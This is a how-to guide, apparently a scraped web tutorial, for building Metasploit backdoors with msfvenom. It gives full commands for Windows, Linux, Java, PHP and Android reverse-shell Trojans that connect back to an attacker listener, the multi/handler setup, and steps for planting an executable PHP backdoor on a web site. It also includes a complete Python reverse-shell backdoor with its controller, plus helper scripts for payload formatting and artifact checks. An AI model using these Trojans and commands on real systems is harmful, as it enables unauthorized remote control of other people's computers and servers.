Msf-shellcode Generation and use

Source: Internet
Author: User

1      Environment Used

Kali 2.0

Msfvenom

2      msfvenom Parameter Description

msfvenom -h shows the help. Note that the short options are lowercase (-p, not -P); msfvenom rejects the uppercase forms.

Options:

-p, --payload <payload>    Payload to use. Specify '-' or stdin to use a custom payload

-l, --list [module_type]    List all modules of the given type. Types are: payloads, encoders, nops, all

-n, --nopsled <length>    Prepend a NOP sled of the given length to the payload

-f, --format <format>    Output format (use --help-formats for the list of formats MSF supports)

-e, --encoder <encoder>    The encoder to use

-a, --arch <architecture>    Target architecture of the payload

--platform <platform>    Target platform of the payload

-s, --space <length>    Maximum size of the resulting payload

-b, --bad-chars <list>    The list of bytes the payload must avoid, for example: '\x00\xff'

-i, --iterations <count>    The number of times to encode the payload

-c, --add-code <path>    Specify an additional Win32 shellcode file to include

-x, --template <path>    Specify a custom executable file to use as a template

-k, --keep    Preserve the template's behaviour and inject the payload as a new thread

--payload-options    List the payload's standard options

-o, --out <path>    Save the payload to a file

-v, --var-name <name>    Specify a custom variable name to use for certain output formats

--smallest    Generate the smallest possible payload

-h, --help    Show the help

--help-formats    List the output formats MSF supports

2.1  Commonly Used Help Commands

msfvenom --help-formats lists the output formats that can be generated.

msfvenom -l encoders lists the available encoders.
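To make the -b, -s, -f and -v options above concrete, the following added example (written for this page, not code from msfvenom itself) performs the same checks and transformations on a constructed byte string that stands in for raw shellcode: it scans for the bytes a target forbids, checks the payload fits the available space, and renders the bytes the way -f c, -f python and -f hex do. SAMPLE_SHELLCODE is deliberately not real shellcode; it just contains the two bytes most often banned so the check has something to find.

```python
from typing import List, Tuple

# Constructed sample, not real shellcode: it contains \x00 and \xff so the
# bad-character check below has something to report.
SAMPLE_SHELLCODE = b"\x31\xc0\x50\x68\x00\x2f\x73\x68\xff\xe4\x0a"


def parse_bad_chars(spec: str) -> bytes:
    """Turn a -b style spec such as '\\x00\\xff' into the bytes it names."""
    return bytes(int(tok, 16) for tok in spec.split("\\x") if tok)


def find_bad_chars(shellcode: bytes, bad: bytes) -> List[Tuple[int, int]]:
    """Return (offset, byte) for every banned byte present. An empty list means
    the payload is usable as-is; otherwise an encoder (-e, -i) is needed."""
    return [(i, b) for i, b in enumerate(shellcode) if b in bad]


def fits_in_space(shellcode: bytes, space: int) -> bool:
    """The -s check: the (encoded) payload must fit the buffer you have."""
    return len(shellcode) <= space


def format_shellcode(shellcode: bytes, fmt: str, var: str = "buf") -> str:
    """Render raw bytes as -f c / -f python / -f hex would; -v sets the variable name."""
    if fmt == "hex":
        return shellcode.hex()
    if fmt == "python":
        body = "".join(f"\\x{b:02x}" for b in shellcode)
        return f'{var} = b"{body}"'
    if fmt == "c":
        lines = []
        for i in range(0, len(shellcode), 16):
            chunk = shellcode[i:i + 16]
            lines.append('"' + "".join(f"\\x{b:02x}" for b in chunk) + '"')
        return f"unsigned char {var}[] =\n" + "\n".join(lines) + ";"
    raise ValueError(f"unsupported format: {fmt}")


if __name__ == "__main__":
    bad = parse_bad_chars("\\x00\\xff")
    print("bad bytes at:", find_bad_chars(SAMPLE_SHELLCODE, bad))
    print(format_shellcode(SAMPLE_SHELLCODE, "c", "sc"))
```

The offsets returned by find_bad_chars are what you look at when an encoded payload still fails: re-run the check on the encoder's output, not on the raw payload, because it is the final bytes that must survive the target's input filter.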

3      Generating Several Kinds of Backdoor with Metasploit

Metasploit can generate backdoors in many formats: PHP, EXE (a Windows backdoor), Linux backdoors, Java backdoors, Android backdoors and so on.

It can produce ASP, ASPX, PHP, JSP, WAR, EXE and many other types.

The msfpayload command no longer exists; it has been replaced by msfvenom, which integrates msfpayload and msfencode into one tool.

3.1  Building a Windows Backdoor Program

Use the following module to generate a backdoor for Windows systems:

windows/meterpreter/reverse_tcp

When building the Trojan you can give --arch x86 --platform windows or leave them out; if they are left out msfvenom prints a warning that can be ignored. The payload follows -p, the output format follows -f, and LHOST/LPORT are the address and port the backdoor will connect back to (the Kali machine here):

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.115 LPORT=1234 -f exe > /aaa.exe


Or, with the architecture and platform given explicitly:

msfvenom -p windows/meterpreter/reverse_tcp --arch x86 --platform windows LHOST=192.168.1.115 LPORT=1234 -f exe > /aaa.exe


The IP address of the machine that will receive the Trojan is 192.168.1.123.

Copy the generated Trojan aaa.exe from Kali's root directory (/) to the target machine 192.168.1.123.


======================================================

To set up the listener:

Use the handler module: use exploit/multi/handler



Set the payload to the same one the Trojan was built with (set PAYLOAD windows/meterpreter/reverse_tcp), and set LHOST and LPORT to the values given to msfvenom (192.168.1.115 and 1234); a handler whose payload, address or port differs will never receive the session.


Start the listener with exploit.

=================================================

Double-click aaa.exe on the target machine. Kali then shows the result below:

This shows that 192.168.1.123 has run the Trojan and a Meterpreter session has opened, so the machine can now be controlled.



Enter shell in the Meterpreter console to get a command shell on the machine.


Check the machine's IP address (ipconfig) to confirm that it is 192.168.1.123.


3.2  Building a Linux Backdoor Program

Use the following module to build a Linux backdoor, in the same way as the Windows backdoor (with -f elf as the output format instead of -f exe):

linux/x86/shell_reverse_tcp

The only difference from Windows is that the Trojan generated for Linux must be given execute permission with chmod before it will run:

chmod +x program_name

Run the Trojan under Linux with:

./program_name
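What the shell_reverse_tcp payload and the handler from 3.1 actually do on the wire is simple, and the following added example (written for this page, not Metasploit's code) shows both ends in pure Python so the exchange can be run locally: the listener binds first, the "Trojan" connects out to it, and the listener then sends commands and collects their output. Both ends run on 127.0.0.1 with an OS-chosen port; the victim side assumes a POSIX /bin/sh is present because that is what subprocess uses with shell=True. The framing (a newline-terminated command one way, a length-prefixed result the other) is this example's own, not the real payload's.

```python
import socket
import struct
import subprocess
import threading
from typing import List, Sequence


def backdoor(lhost: str, lport: int) -> None:
    """Victim side: connect out to LHOST:LPORT, then read one command per line,
    run it with /bin/sh (assumed present) and send back a length-prefixed result."""
    with socket.create_connection((lhost, lport)) as s:
        f = s.makefile("rb")
        for line in f:
            cmd = line.decode().strip()
            if cmd == "exit":
                break
            proc = subprocess.run(cmd, shell=True, capture_output=True)
            result = proc.stdout + proc.stderr
            s.sendall(struct.pack("!I", len(result)) + result)


def listener(lport: int) -> socket.socket:
    """Listener side, step 1: bind and listen *before* the Trojan runs, exactly
    as exploit/multi/handler must be started first. lport=0 lets the OS pick."""
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", lport))
    srv.listen(1)
    return srv


def recv_exact(conn: socket.socket, n: int) -> bytes:
    """Read exactly n bytes or raise if the victim went away mid-message."""
    buf = b""
    while len(buf) < n:
        chunk = conn.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("victim disconnected")
        buf += chunk
    return buf


def handle_session(srv: socket.socket, commands: Sequence[str]) -> List[bytes]:
    """Listener side, step 2: accept the inbound connection and drive the shell."""
    conn, _ = srv.accept()
    results: List[bytes] = []
    with conn:
        for cmd in commands:
            conn.sendall(cmd.encode() + b"\n")
            (length,) = struct.unpack("!I", recv_exact(conn, 4))
            results.append(recv_exact(conn, length))
        conn.sendall(b"exit\n")
    return results


def run_demo(commands: Sequence[str] = ("echo ping", "echo $((1+1))")) -> List[bytes]:
    """Run both ends on 127.0.0.1: start the listener, 'run the Trojan' in a
    thread, and return the output the listener collected for each command."""
    srv = listener(0)
    port = srv.getsockname()[1]
    victim = threading.Thread(target=backdoor, args=("127.0.0.1", port))
    victim.start()
    try:
        return handle_session(srv, commands)
    finally:
        victim.join()
        srv.close()


if __name__ == "__main__":
    for out in run_demo(("id", "uname -a")):
        print(out.decode(errors="replace"), end="")
```

Two things the exchange makes visible: the victim initiates the TCP connection, which is why a reverse payload gets through firewalls that block inbound connections but not outbound ones, and the listener must already be bound when the Trojan runs, which is why section 3.1 starts the handler before copying aaa.exe over.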

3.3  Building a Java Backdoor Program

A Java program can be run on both Windows and Linux.

Use the following module to generate the backdoor:

java/meterpreter/reverse_tcp

Command to generate the Trojan (the raw output of a Java payload is a jar file):

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.115 LPORT=2222 -f raw > /jar.jar



3.4  Building a PHP Backdoor Program

Module used:

php/meterpreter/reverse_tcp

Command to generate the Trojan (the raw output of a PHP payload is PHP source):

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.115 LPORT=2222 -f raw > /php.php

Put the generated PHP file on the web site; when someone requests it, the server executes it and it connects back to the listener. Note that the raw output begins with the opening tag commented out, as /*<?php /**/; edit the file so that it starts with a plain <?php, otherwise the server serves it as text instead of running it.

3.5  Building an Android Backdoor Program

Module used:

android/meterpreter/reverse_tcp

Command to generate the Trojan (the raw output of an Android payload is an apk):

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.115 LPORT=2222 -f raw > /android.apk
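Before any of the artifacts from 3.1 to 3.5 is copied to a target, it is worth checking that msfvenom wrote what was asked for: a shell redirection happily writes an error message or an empty file to /aaa.exe. The following added example (written for this page, not msfvenom's code) checks the first bytes against what each format on this page should produce, repairs the commented-out open tag of a raw PHP payload, and pulls the callback address out of a PHP stager so it can be compared with the handler. The SAMPLES are constructed stand-ins for the first bytes of real output; the $ip/$port pattern is the one the php/meterpreter stager uses, and the PHP sample here was written to match it.

```python
import re
from typing import Dict, Optional, Tuple

# Constructed stand-ins for the start of each artifact, not real msfvenom output.
SAMPLES: Dict[str, bytes] = {
    "exe": b"MZ\x90\x00\x03\x00\x00\x00",
    "elf": b"\x7fELF\x02\x01\x01\x00",
    "jar": b"PK\x03\x04\x14\x00\x08\x08",
    "php": b"/*<?php /**/ error_reporting(0); $ip = '192.168.1.115'; $port = 2222;",
    "err": b"Error: Invalid payload: windows/meterpreter/reverse_tcpp\n",
}

# What each output on this page must start with.
EXPECTED_MAGIC: Dict[str, bytes] = {
    "exe": b"MZ",           # -f exe: Windows PE image
    "elf": b"\x7fELF",      # -f elf: Linux ELF image
    "jar": b"PK\x03\x04",   # raw Java payload: a jar, which is a zip container
    "apk": b"PK\x03\x04",   # raw Android payload: an apk, also a zip container
}

PHP_OPEN_TAG_COMMENTED = b"/*<?php /**/"


def classify_artifact(data: bytes) -> str:
    """Name the container an artifact appears to be from its leading bytes."""
    for name in ("exe", "elf", "jar"):
        if data.startswith(EXPECTED_MAGIC[name]):
            return "zip" if name == "jar" else name
    if data.lstrip().startswith((b"<?php", PHP_OPEN_TAG_COMMENTED)):
        return "php"
    return "unknown"


def check_format(data: bytes, fmt: str) -> bool:
    """True if the bytes look like what msfvenom should have produced for fmt
    (exe, elf, jar, apk or php). An error message or an empty file fails."""
    if fmt == "php":
        return classify_artifact(data) == "php"
    return data.startswith(EXPECTED_MAGIC[fmt])


def fix_php_open_tag(data: bytes) -> bytes:
    """Raw php/meterpreter output starts with '/*<?php /**/', so the open tag is
    inside a comment and a web server serves the file as text. Make it live."""
    if data.startswith(PHP_OPEN_TAG_COMMENTED):
        return b"<?php" + data[len(PHP_OPEN_TAG_COMMENTED):]
    return data


def php_callback(data: bytes) -> Optional[Tuple[str, int]]:
    """Extract the LHOST/LPORT compiled into a PHP stager ($ip = '...'; $port = N;)
    so they can be compared with the handler. None if the pattern is absent."""
    m = re.search(rb"\$ip\s*=\s*'([^']+)'\s*;\s*\$port\s*=\s*(\d+)\s*;", data)
    if not m:
        return None
    return m.group(1).decode(), int(m.group(2))


if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(name, "->", classify_artifact(data))
    print(php_callback(fix_php_open_tag(SAMPLES["php"])))
```

Run check_format on the real file (open(path, "rb").read()) right after the msfvenom command; the "err" sample shows why: a mistyped payload name produces an error on stdout that the redirection writes into the output file, and a check on the magic bytes catches that before the file is copied anywhere.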

